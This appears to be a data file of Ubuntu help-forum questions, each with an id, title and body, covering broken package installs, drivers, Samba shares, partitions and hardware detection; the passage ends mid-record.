424711	error installing packages or updating due to dpkg : error processing linux-image-extra-3.11.0-15-generic	a few days back i tried to install 0ad , a game , through the terminal . i accidentally closed the terminal before it was finished and now i ca n't install or update any program on my machine . i 'm running 13.10 . i have tried searching and found many articles , posts , and discussions around this error but i have yet to find a method that works to fix it . i have tried running sudo apt-get clean & & sudo apt-get autoremove which outputs reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : linux-headers-3.11.0-12 linux-headers-3.11.0-12-generic linux-image-3.11.0-12-generic linux-image-extra-3.11.0-12-generic 0 upgraded , 0 newly installed , 4 to remove and 0 not upgraded . 7 not fully installed or removed . after this operation , 210 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 315931 files and directories currently installed . ) removing linux-headers-3.11.0-12-generic ... removing linux-headers-3.11.0-12 ... removing linux-image-extra-3.11.0-12-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic update-initramfs : deleting /boot/initrd.img-3.11.0-12-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic /usr/sbin/grub-mkconfig : 35 : /etc/default/grub : syntax error : eof in backquote substitution run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-extra-3.11.0-12-generic.postrm line 328. dpkg : error processing linux-image-extra-3.11.0-12-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 removing linux-image-3.11.0-12-generic ... examining /etc/kernel/prerm.d . run-parts : executing /etc/kernel/prerm.d/dkms 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic dkms : removing : bbswitch 0.7 ( 3.11.0-12-generic ) ( i686 ) -- -- -- -- uninstall beginning -- -- -- -- module : bbswitch version : 0.7 kernel : 3.11.0-12-generic ( i686 ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - status : before uninstall , this module version was active on this kernel . bbswitch.ko : - uninstallation - deleting from : /lib/modules/3.11.0-12-generic/updates/dkms/ - original module - no original module was found for this module on this kernel . - use the dkms install command to reinstall any previous module version . depmod ... .. dkms : uninstall completed . dkms : removing : nvidia-319-updates 319.60 ( 3.11.0-12-generic ) ( i686 ) -- -- -- -- uninstall beginning -- -- -- -- module : nvidia-319-updates version : 319.60 kernel : 3.11.0-12-generic ( i686 ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - status : before uninstall , this module version was active on this kernel . nvidia_319_updates.ko : - uninstallation - deleting from : /lib/modules/3.11.0-12-generic/updates/dkms/ - original module - no original module was found for this module on this kernel . - use the dkms install command to reinstall any previous module version . depmod ... . dkms : uninstall completed . examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic update-initramfs : deleting /boot/initrd.img-3.11.0-12-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic /usr/sbin/grub-mkconfig : 35 : /etc/default/grub : syntax error : eof in backquote substitution run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.11.0-12-generic.postrm line 328. dpkg : error processing linux-image-3.11.0-12-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : linux-image-extra-3.11.0-12-generic linux-image-3.11.0-12-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) then i also tried running sudo dpkg -- configure -a which outputs dpkg : dependency problems prevent configuration of linux-image-extra-3.11.0-15-generic : linux-image-extra-3.11.0-15-generic depends on linux-image-3.11.0-15-generic ; however : package linux-image-3.11.0-15-generic is not configured yet . dpkg : error processing linux-image-extra-3.11.0-15-generic ( -- configure ) : dependency problems - leaving unconfigured setting up linux-image-3.11.0-17-generic ( 3.11.0-17.31 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.11.0-17-generic /boot/vmlinuz-3.11.0-17-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.11.0-17-generic /boot/vmlinuz-3.11.0-17-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.11.0-17-generic /boot/vmlinuz-3.11.0-17-generic update-initramfs : generating /boot/initrd.img-3.11.0-17-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.11.0-17-generic /boot/vmlinuz-3.11.0-17-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.11.0-17-generic /boot/vmlinuz-3.11.0-17-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.11.0-17-generic /boot/vmlinuz-3.11.0-17-generic /usr/sbin/grub-mkconfig : 35 : /etc/default/grub : syntax error : eof in backquote substitution run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.11.0-17-generic.postinst line 1010. dpkg : error processing linux-image-3.11.0-17-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-extra-3.11.0-17-generic : linux-image-extra-3.11.0-17-generic depends on linux-image-3.11.0-17-generic ; however : package linux-image-3.11.0-17-generic is not configured yet . dpkg : error processing linux-image-extra-3.11.0-17-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.11.0-17-generic ; however : package linux-image-3.11.0-17-generic is not configured yet . linux-image-generic depends on linux-image-extra-3.11.0-17-generic ; however : package linux-image-extra-3.11.0-17-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.11.0.17.18 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic-pae : linux-generic-pae depends on linux-generic ( = 3.11.0.17.18 ) ; however : package linux-generic is not configured yet . dpkg : error processing linux-generic-pae ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-extra-3.11.0-15-generic linux-image-3.11.0-17-generic linux-image-extra-3.11.0-17-generic linux-image-generic linux-generic linux-generic-pae i 'm at a loss and do not know where to go from here . any help you could provide will be greatly appreciated . the output of uname -r is 3.11.0-15-generic edit i ran sudo dpkg -p linux-image-3.11.0-12-generic and got output ( reading database ... 286111 files and directories currently installed . ) removing linux-image-3.11.0-12-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic update-initramfs : deleting /boot/initrd.img-3.11.0-12-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic /usr/sbin/grub-mkconfig : 35 : /etc/default/grub : syntax error : eof in backquote substitution run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.11.0-12-generic.postrm line 328. dpkg : error processing linux-image-3.11.0-12-generic ( -- purge ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : linux-image-3.11.0-12-generic i then ran sudo apt-get install -f and got output reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : linux-image-3.11.0-12-generic linux-image-extra-3.11.0-12-generic 0 upgraded , 0 newly installed , 2 to remove and 0 not upgraded . 9 not fully installed or removed . after this operation , 136 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 286111 files and directories currently installed . ) removing linux-image-extra-3.11.0-12-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic update-initramfs : deleting /boot/initrd.img-3.11.0-12-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic /usr/sbin/grub-mkconfig : 35 : /etc/default/grub : syntax error : eof in backquote substitution run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-extra-3.11.0-12-generic.postrm line 328. dpkg : error processing linux-image-extra-3.11.0-12-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 removing linux-image-3.11.0-12-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic update-initramfs : deleting /boot/initrd.img-3.11.0-12-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic /usr/sbin/grub-mkconfig : 35 : /etc/default/grub : syntax error : eof in backquote substitution run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.11.0-12-generic.postrm line 328. dpkg : error processing linux-image-3.11.0-12-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : linux-image-extra-3.11.0-12-generic linux-image-3.11.0-12-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 )
424714	scanner does n't scan	ubuntu 12.04 . hp scanjet 2400 . simple scan 3.43 wo n't work . it just keeps loading forever . i `` turned it off and on again ( r ) '' and now it just says it ca n't connect to the scanner , despite the correct model showing on the device list dropdown . $ lsusb bus 002 device 003 : id 03f0:0a01 hewlett-packard scanjet 2400c $ sane-find-scanner found usb scanner ( vendor=0x03f0 [ hewlett-packard ] , product=0x0a01 [ hp scanjet scanner ] , chip=gl646_hp ) at libusb:002:003 $ scanimage -l device `genesys : libusb:002:003 ' is a hewlett packard scanjet 2400c flatbed scanner
424715	ubuntu 13.04 tells me it wo n't update itself anymore , wants me to upgrade to 13.10	my girlfriend was using my ubuntu 13.04 , when the software update window opened , with an alert box reading something like : ubuntu 13.04 updates are not provided anymore , for your security you should upgrade to 13.10 . i did n't think of making a screen capture because my girlfriend was in a time crunch , but it happened a few days ago ( 02-19-2014 ) , and i have not received system updates since . i thought .04s where long term releases , it has n't been out for a year yet . what 's happening ? anyone else saw that message ?
424717	ubuntu 13.10 fail to load graphics driver , black screen after login	i accidentaly chose the properitary driver in additional drivers in my machine instead of the xorg , and suddenly i can not login , i uninstall fglrx deleted xorg.conf but i ca n't still login.w hat do i do ?
424719	installed ubuntu ; ca n't acess windows any more	i have windows vista , and i downloaded ubuntu 12.04 and burned it onto a blank cd disk . i then went through the installation process by clicking install ubuntu on the menu that popped up after booting from my disk . i then selected the option that said install alongside windows vista . this is where it gets weird . it gave me the partition creator/slider option to decide how much data i needed for windows and ubuntu . it displayed only like a total of 10 gigabytes , giving windows vista around 6 gigs , and ubuntu 12.04 around 4 gigs . my computer has a 500 gigabyte hard drive so i have no idea why it gave me such small numbers . after clicking next i decided that i should restart with the `` create your own partitions '' option so i restarted the computer and booted straight back into the disk i had ubuntu on . i made a 500mb linux swap partition , and a 25gb primary ex4/journaling partition mounted at / . i selected that partition , and the installation process began . it was installing okay until towards the end , when it froze . the mouse pointer was no longer moving and the loading animation was not spinning anymore . i waited around ten minutes and nothing happened so i force shut down the computer . i repeated the whole installation process remaking the partitions , and ubuntu finally installed . the installer told me to restart the computer so i did . when it booted up it gave me a screen that said `` frequency out of range '' i could n't do anything with my computer . after that i restarted my computer again and after going to the frequency out of range screen , it actually booted ubuntu . overall , i now have a computer that sometimes boots to ubuntu , and i ca n't boot into windows at all . this is a serious problem because all of my parents stuff and my stuff is on windows . please help .
424722	here 's my smb.conf file . whats wrong with it ?	i have reduced this to almost 0 security . i 've tried security = user . i ca n't for the life of me see on my windows machine these shared drives . i 've also had the netbios name equal my workgroup name . if someone could tell me if there is something wrong here , that would be nice . [ global ] workgroup = solarsystem netbios = sun server string = solarsystem samba server security = share force user = dwarf [ movies ] comment = entire shared drive path = /mnt/media/movies read only = no guest ok = yes writable = yes
424726	ubuntu 12.04 does not detect wifi and connect to it	i am a newbie to ubuntu . i have installed ubuntu 12.04 freshly onto my system and since then have been desperately been trying to get it to detect my wifi and connect to it . i have tried several approaches but none of them seem to have worked so far . can someone please advise me on this ? when i type in iwconfig i get : - eth0 no wireless extensions lo no wireless extensions sudo lshw -c network gives : - *-network description : network controller product : bcm43228 802.11a/b/g/n vendor : broadcom corporation physical id :0 bus info : pci @ 0000:02:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=bcma-pci-bridge latency=0 resources : irq:17 memory : d5300000-d5303fff *-network descriotion : ethernet interface product : netxtreme bcm5761 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0a:00.0 logical name : eth0 version : 10 serial : b8 : ac:6f : ca : be:2a capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpdmsi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.132 frimware-5761-v3.78 latency=0 link=no multicast=yes port=twisted pair resources : irq:44 memory : d411000-d411ffff memory : d4100000-d410ffff please let me know if more information is needed .
424727	unable to connect ubuntu 12.04 to a projector using the vga port	whenever i try to connect my lenovo g570 with ubuntu 12.04 64-bit to a projector , it gets detected , but the display on both , the projector and on my laptop keep blinking continuously making it unusable . even the focus of the screen shift from one workspace , that is , i am able to view two halves of workspaces . laptop specifications : 2nd gen core i3 , 4gb ram , amd radeon graphics i have ati/amd proprietary fglrx graphics driver ( **experimental** beta ) installed , but the status displays : `` this driver is activated but not currently in use . '' here is a screenshot : should i remove it and try finding some alternative driver ? is there any software to correct it ? or is it a completely different problem ? ? i face the issue with the unity environment . i have gnome environment also installed but i have n't tried connecting using it . i 'll try that and update on the question .
424729	how can i uninstall an application that software center will not ?	running ubuntu 12 . 04 . installed both `` virtualbox '' and `` x86 virtualization solution - base binaries '' . i downloaded a newer version of virtual box , specifically `` virtualbox-4.3_4.3.6-91406~ubuntu~precise_i386.deb '' , from the downloads page . when i try to install this by right clicking on the file , and selecting `` open with ubuntu software center '' , the software center opens with the error : conflicts with the installed package virtualbox-guest-additions-iso having previously installed gdebi , i can also right click that same file and select `` open with gdebi package installer '' , and that process results in the exact same error message . since the package virtualbox-guest-additions-iso is a part of `` x86 virtualization solution - base binaries '' , i 've used the software center to uninstall the entire package , which also uninstalls `` virtualbox '' . after that process , any subsequent attempt to install virtualbox-4.3_4.3.6-91406~ubuntu~precise_i386.deb results in the same error message . and if i search for just virtualbox-guest-additions-iso in the software center , it finds it and offers the option to `` re-install '' it , but not to remove it . why ? and how should i proceed ? i 'm sure i 've done things in my ubuntu installation that have deviated from the default install . but i 've really tried to keep that to a minimum .
424731	streaming video with vlc from windows machine is suddenly slow , but why ?	i have a dell latitude d420 running ubuntu 12.04 and a dell latitude e6400 running windows 7 . normally i stream video from my windows machine to my linux machine while gaming . up until yesterday this has worked just fine . i have one folder with multiple videos that i right-click in nautilus ans select `` open with '' then `` vlc media player '' from the context menu . i ca n't recall what or if i did anything to make changes to the system except an xfce update , but now when i try to open a folder it takes at least 60 seconds to begin playing , and when it does play , the video stops and starts every minute or so . the progress bar in vlc turns green while it 's waiting , then resumes . i 'm not sure if this is an issue with my eth0 interface or an issue with samba . i use synergy and there is no lag with that at all . the only thing i recall updating is xfce , which i have since uninstalled on the off chance the update was responsible . i have tried removing vlc and reinstalling , pinged the computer from my win box ( no apparent delays ) , checked the cables , restarted the router , checked for disk/hardware errors on the windows machine . no love any ideas ?
424732	how do i calibrate colors without extra hardware , like dccw.exe on windows ?	colors on my monitor are too yellow . on windows 7 , there is the color calibration tool accessible from the control panel , or as dccw.exe . i 'd like to calibrate color without extra spectrometers are other special hardware . note that dccw does this by showing you a series of photos and asking you to adjust colors so that the photos match a certain description ( e.g. , so that two shares or black are just barely visible , or that some stripes appear distinct ) . how can i do that in ubuntu ? using asus laptop , xubuntu 13.10
424733	not able to connect to irc.freenode.net on xchat irc client in ubuntu 13.04	i am facing problems connecting to the freenode irc server on my xchat irc client . my service provider is tikona . i have to go to a proxy 1.254.254.254 , enter my login credentials and then i am connected to the internet . the xchat client was working for me when i was on an open proxy connection yesterday which does not required any such credentials . it sometimes connects but then again disconnects immediately . and sometimes , it shows fewer users who are connected to the channel ( whereas the browser based client shows much more users ) . please let me know if there are any additional settings that need to be done when i am using an internet connection that needs such login credentials . or is the problem something else ? please help .
424735	unallocated space from windows 7 to ubuntu	i shrank my /dev/sda1 using windows 7 partition program and i want to extend /dev/sda3 with that unallocated space . i know i have to use a live ubuntu cd/usb and use gparted . but i ca n't seem to manage adding that space to /dev/sda3 . can someone please help me ?
424738	why does vlc get mount errors after connecting iphone via usb	after installing the latest libimobildevice updates most of the trust issues were resolved . but now i have a new irksome problem where each time i connect my iphone via usb vlc gets mount errors ( see below ) . i googled exhaustively around and could not find any clues as to fixing the problem . most references were regarding smb . its not a `` show stopper '' but it does need to be addressed . when i check my .gvfs home directory nothing is listed . i tried creating the requested files to no avail . this gvfs mounting thing is very cludgy to me . it is unlike the unix mounting i have experience with . there appears to be some kind of cross-mounting . any help is appreciated . vlc errors file reading failed : vlc could not open the file `` /home/jspot/.gvfs/juser . ( no such file or directory ) vlc is unable to open the mrl 'file : ///home/jspot/.gvfs/juser'.heck the log for details . accompanying pop up error : unable to mount juser location is already mounted
424742	12.04 variable ( long ) boot times , lenovo ideapad	i have a lenovo u430 ideapad , 4th gen i7 , intel haswell-ult integrated graphics , intel 7260 wireless , crucial ssd . it had win8 when i bought it and i replaced it with ubuntu 12.04 , 64-bit , uefi mode . when i boot the machine , i get the lenovo screen ( ~3 sec ) , the grub screen ( ~10 sec timer ) , then default ubuntu boot starts . sometimes i get the ubuntu log-on screen right away ( ~5 sec , after adjusting screen brightness from min to max ) . yeah ! sometimes i get a dark purple , grub-like screen for > 3 minutes and then the ubuntu log-on screen ( after brightness adjustment ) . sometimes i get a black screen with blinking cursor for > 3 minutes and then the ubuntu log-on screen ( after brightness adjustment ) . if i get either the dark purple or black screen , and i do a hard reset ( power switch ) , then i get the log-on screen within 5 seconds of grub screen . yeah ! the same patterns hold for legacy boot configuration . three related questions : ( 1 ) is there a way to fix this so that i get the normal rapid boot every time ? ( 2 ) if not , will i damage my hardware or software if i do a hard reset every time the boot process stalls ? ( 3 ) should i switch to 13.10 , or wait until 14.04 ? thanks for your help .
424743	temperature rise in ubuntu ( with open source drivers )	my laptop is a dell 3520 with the following specifications . intel® core™ i3-3110m cpu @ 2.40ghz × 4 intel® ivybridge mobile graphics i have installed ubuntu 13.10 . the temperature is 50 degrees when i boot the laptop . it rises to an average of 65-68 degrees very quickly . running chrome and vlc ( with normal videos ) together takes the temperature to 75 degrees ( on an average ) . running 1080p videos makes the temperature shoot upto 85 degrees before shutting down . also i dont hear any fan sound . i doubt if it is running at all . i tried searching for solutions and most of the problems are for nvidia graphics . i dont know what the problem is with my laptop . could someone please help me solve this problem . p.s : please let me know if any more specification or system information is needed .
424746	drivers questin	i use a hdd with ubuntu 12.04 on it for school , and when i do school related work i plug it on my pc and work on it , but i 've found some problems and i think its due to the graphics drivers , i installed the nvidia ones for my pc , but the school pc has integrated graphic chipset , so i would need different drivers . can i install both on the same ubuntu system without causing driver conflicts or something ?
424749	i cant install kubuntu-desktop in ubuntu 13.10 saucy	i have a problem with my ubuntu 13.10 i want to install kubuntu-desktop but do via console says it can not be installed because it depends on kworskspaces kwin and i have broken packages on my system , check from synaptic but no broken packages which i can do
424753	ubuntu 13.10 ( parallels vm ) - could not apply the stored configuration for monitors	ubuntu 13.10 - could not apply the stored configuration for monitors so i 'm essentially having the same problem as the thread linked above . however , because i do n't have enough `` rep '' , i have to start a new thread/question . the main difference i have from the referenced thread is that my 13.10 is running on a parallels vm ( version 9 ) , and i have looked through the package contents of the vm and ca n't find the monitors.xml file that is recommended to be deleted . also , i upgraded from 13.04 to 13.10 . any help/info would be appreciated , thanks !
424755	ssh to computer with user not logged in	i have two computers with ubuntu 12.04.4 and 12.04.2 . the 12.04.2 is set up to request a password before login on start up . when the pc is turn on i am able to connected to the 12.04.2 from 12.04.4 using ssh but if the 12.04.2 is restarted i am not able to connect . i guess this is because the user is not log in yet in 12.04.2 . is there a way to connect to the pc if it is restarted and the user is not yet log in ?
424756	calibrate printer color by hand	how does one calibrate the color of a printer by hand or by eye . more specifically , the printer just has to match the monitor , it does n't matter if they are both perfect . is there a way that you can print a test image , and then on a monitor have it adjust the color til it matches the printed version . then when you print , it would do the opposite transformation , so that it matches the monitor ?
424760	boot removed after installing windows	i have ubuntu 13.10 installed on my computer ( d : \ or sda2 ) via wubi installer , but recently i have removed my windows and installed windows 8 instead and that removed the option to boot to ubuntu . i tried to use the boot repair live cd and the grub tool too but it was no good , please i looked for many solution and none of them worked i really need help . thanks
424761	info for os on new hand sets	how can i get ubuntu for some new mobile device as are planning to launch new mobile device , what about installation of additional apps , what built in features & apps are to be offered with os , expecting detailed info .
424762	nouveau gpu lockup error while updating	installed ubuntu , updates installed . clicked in the search lens , then the it hung there for about 15 minutes and then got out , :
424765	trying to create a win7 virtual box	but this happens : would anyone know what to do , i do not know too very much about terminal , so please be patient . running ubuntu 12.04 64x amd .
424771	resize partitions on a remote server	i have two partitions , one is about 1.8tb ( home ) and the other is 20gb ( root ) . i want this to be the other way round , 1.8tb ( root ) and 20gb ( home ) . i 've been reading for some time , but am struggling to find a solution . i am told i can not use : sudo fdisk -l as i am using guid partition table . running parted , i get the following for 'print devices ' : /dev/sda ( 2000gb ) /dev/sdb ( 2000gb ) /dev/md2 ( 21.0gb ) /dev/md3 ( 1979gb ) i know little of filesystems , but i believe the 1st two are seperate 2tb hard drives , and the md2 and md3 are my root and home partitions . is there any way i can shrink /dev/md3 to 21gb and grow /dev/md2 to 1979gb via ssh ?
424777	zbox nano ad-10 no hdmi audio 13.10	i am at my wits end . i have spent uncountable number of days following all possible solutions found through google to no avail . aplay -l provides the following card 0 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevice # 0 : subdevice # 0 card 1 : sb [ hda ati sb ] , device 0 : alc892 analog [ alc892 analog ] subdevices : 1/1 card 1 : sb [ hda ati sb ] , device 1 : alc892 digital [ alc892 digital ] subdevices : 1/1 before 13.10 i was able to have audio using hw:0,3 after using fglrx . now i ca n't use fglrx because it locks the system while trying to boot . does anyone know the precise actions i need to take to make this work . please do n't send me on another wild goose chase .
424778	how do i add a standard user into sudoers ' file using `echo` ?	i am using ubuntu 12.04 and i was doing through a terminal tutorial . there was explained about echo command and he mentioned something about adding your name to the sudoers file using echo > > . i am just wondering what it was ? can anyone tell me how to do it ?
424779	how to install ubuntu one on different drive	i have a small ssd with windows on it mapped as the c : drive . i also have a hdd mapped as e : which i am using as storage . part of the storage is moving some programs from drive c : to drive e : . other programs i have installed to e : without a hitch , but when i run the installer for ubuntu one it automatically chooses drive c : . is there a way i can do an `` advanced '' or similar installation and change the drive ? also , i have followed steps in ubuntu one help to remove the appdata/local files needed for `` full '' uninstall .
424784	configuring samba shares for multiple users	first of all , i apologize if this is a duplicate , but i 've been having serious issues both figuring out and also finding a resolution to my situation on any threads on multiple sites for days now . i have setup samba and have been able to use it with no apparent issues for my main user with read write privileges . my issue : i want to add a second user with just read access , however this user ( 2 ) ca n't log in via windows . swat configuration with the second user added to any field user1 is in has n't worked . i have tried configuring groups to no avail as well . i am not daft , but i am seriously overlooking something seemingly simple . i have tried chmod on the folders . maybe it is something global ? in xinetd ? what am i missing ? thanks in advance ; cheers .
424785	kubuntu on a hp laptop	i use windows 8 on my hp laptop . i ; ve created a bootable pen drive with kubuntu 12.04 . i am able to boot properly , however , i am not getting the option of `` enable wireless '' . when i click on the network icon at the bottom right of the screen , i only see `` enable networking '' and no `` enable wireless '' . ticking enable networking only allows me to use internet through an ethernet cable . pls suggest some solution . what should i do to enable wireless ? ? kindly reply .
424786	permission denied while running make install	i am trying to install gtk-server . first i typed the command ./configure and then make , but when i typed command make install it gave me this error : osama @ osama-hp-compaq-6910p : ~/downloads/gtk-server-2.3.1-sr $ make install /usr/bin/install : can not create regular file `/usr/local/bin/gtk-server ' : permission denied mkdir -p /usr/local/bin /usr/bin/install -c gtk-server /usr/local/bin /usr/bin/install -c stop-gtk-server /usr/local/bin /usr/bin/install : can not create regular file `/usr/local/bin/stop-gtk-server ' : permission denied make : *** [ install ] error 1
424791	ubuntu completely freezes , probably unstable graphics driver	my ubuntu 12.04 distro often freezes when for example watching a youtube video . my system is a 15,6 inch bto vbook 15cl17 full hd ips with a intel hd graphics 4600. lspci | grep vga 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) i already tried to update my video card driver but found out that it 's not that easy . i tried to install intel-linux-graphics-installer but this will immediately say that it is not supported on my 12.04 distro . i also tried to install xserver-xorg-video-intel via the ppa : glasen/intel-driver which gave me this output : [ sudo ] password : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : xserver-xorg-video-intel : depends : xorg-video-abi-11 depends : xserver-xorg-core ( > = 2:1.10.99.901 ) e : unable to correct problems , you have held broken packages . and the following did not help sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 20 not upgraded . how can i fix this driver issue ?
424792	aws ftp to /var/www access denied to write	ok , so i just got my amazon web services ec2 server up and running with apache . when i ftp into the server using ip and key.pem you create when setting up the server . everything is good , but when i try to copy my index.php file to /var/www i get access denied message . how can i change the permissions to write to that folder . when i ssh into the server i am able to use commands to delete files in the folder , using sudo .
424797	poor performance in ubuntu 13.10 with intel i5 4670k ( intel hd 4600 )	my fresh install of ubuntu 13.10 is not giving me a smooth desktop experience . every time i minimize windows , i get an animation delay/lag . showing all open windows results in tearing . i am using the intel hd graphics 4600 . anyone got ideas ? is n't intel graphics the best for linux ?
424798	does ubuntu touch support a terminal ?	of course i mean a terminal that you can start easy from your homescreen- if possible as an preinstalled app . and ( and thats an big and ) that supports the same commands like the pc os .
424799	how do i remove any lenses or other software that i might consider spying on me ? can it be turned off ?	i heard a bit about ubuntu installing ad-ware and spyware to track online searches of users . examples are - unity-lenses-shopping , the built in amazon ad app , and the ad server etc . i understand that this may be to generate revenue for canonical . but , i want to remove it all . is there a guide for removing all such spyware ? also , is there a paid version of ubuntu which does not have all this nasty stuff ?
424804	my mobile-broadband device does not work on ubuntu 13.10	my mobile-broadband device does not work on ubuntu 13.10 or any ubuntu based distros . but it works well on fedora 19 and fuduntu . on ubuntu : # lsusb bus 002 device 011 : id 0cf3:3004 atheros communications , inc . bus 002 device 018 : id 1c9e:6061 omega technology wl-72b 3.5g modem bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 0ac8 : c349 z-star microelectronics corp . bus 001 device 004 : id 04fc:0013 sunplus technology co. , ltd viewmate desktop mouse cc2201 bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub # usb-devices t : bus=02 lev=02 prnt=02 port=01 cnt=02 dev # = 7 spd=480 mxch= 0 d : ver= 2.00 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=1c9e prodid=6061 rev=00.00 s : manufacturer=qualcomm , incorporated s : product=qualcomm cdma technologies msm s : serialnumber=000000000002 c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=500ma i : if # = 0 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver= ( none ) # dmesg [ 179.197604 ] usb 2-1.2 : new high-speed usb device number 7 using ehci-pci [ 179.293119 ] usb 2-1.2 : new usb device found , idvendor=1c9e , idproduct=6061 [ 179.293130 ] usb 2-1.2 : new usb device strings : mfr=3 , product=2 , serialnumber=4 [ 179.293137 ] usb 2-1.2 : product : qualcomm cdma technologies msm [ 179.293142 ] usb 2-1.2 : manufacturer : qualcomm , incorporated [ 179.293147 ] usb 2-1.2 : serialnumber : 000000000002 [ 179.295844 ] usb-storage 2-1.2:1.0 : usb mass storage device detected [ 179.295918 ] scsi5 : usb-storage 2-1.2:1.0 [ 180.295738 ] scsi 5:0:0:0 : direct-access hspa mmc storage 2.31 pq : 0 ansi : 2 [ 180.296575 ] scsi 5:0:0:1 : cd-rom hspa mmc storage 2.31 pq : 0 ansi : 2 [ 180.296884 ] sd 5:0:0:0 : attached scsi generic sg3 type 0 [ 180.308339 ] sr1 : scsi-1 drive [ 180.308488 ] sr 5:0:0:1 : attached scsi cd-rom sr1 [ 180.308570 ] sr 5:0:0:1 : attached scsi generic sg4 type 5 [ 180.315955 ] sd 5:0:0:0 : [ sdc ] attached scsi removable disk [ 180.527311 ] iso 9660 extensions : microsoft joliet level 1 [ 180.561077 ] isofs : changing to secondary root on fedora 19 # lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 04fc:0013 sunplus technology co. , ltd viewmate desktop mouse cc2201 bus 001 device 004 : id 0ac8 : c349 z-star microelectronics corp . bus 002 